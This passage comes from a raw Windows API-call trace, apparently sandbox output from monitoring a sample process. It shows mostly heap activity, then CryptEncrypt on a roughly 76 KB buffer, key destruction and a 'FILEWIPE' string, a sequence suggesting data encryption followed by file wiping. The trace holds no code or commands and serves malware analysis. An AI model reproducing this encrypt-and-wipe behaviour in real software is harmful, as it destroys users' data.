(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0187.181] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.181] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.181] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.181] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.182] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.183] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0187.185] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.185] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.185] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.185] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0187.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.185] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.185] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.185] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.186] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.186] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.186] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.186] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.186] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.186] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.186] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.186] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0187.186] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.187] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x12af2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x12b00) returned 1 [0187.187] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.187] CharLowerBuffW (in: lpsz="byte[76545]", cchLength=0xb | out: lpsz="byte[76545]") returned 0xb [0187.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.188] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.188] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa84608*, pdwDataLen=0x87e820*=0x12af2, dwBufLen=0x12b00 | out: pbData=0xa84608*, pdwDataLen=0x87e820*=0x12b00) returned 1 [0187.189] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0187.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.198] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.198] CryptDestroyKey (hKey=0x90af18) returned 1 [0187.202] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.202] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.202] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.202] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.202] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0187.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.224] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.224] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0187.226] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 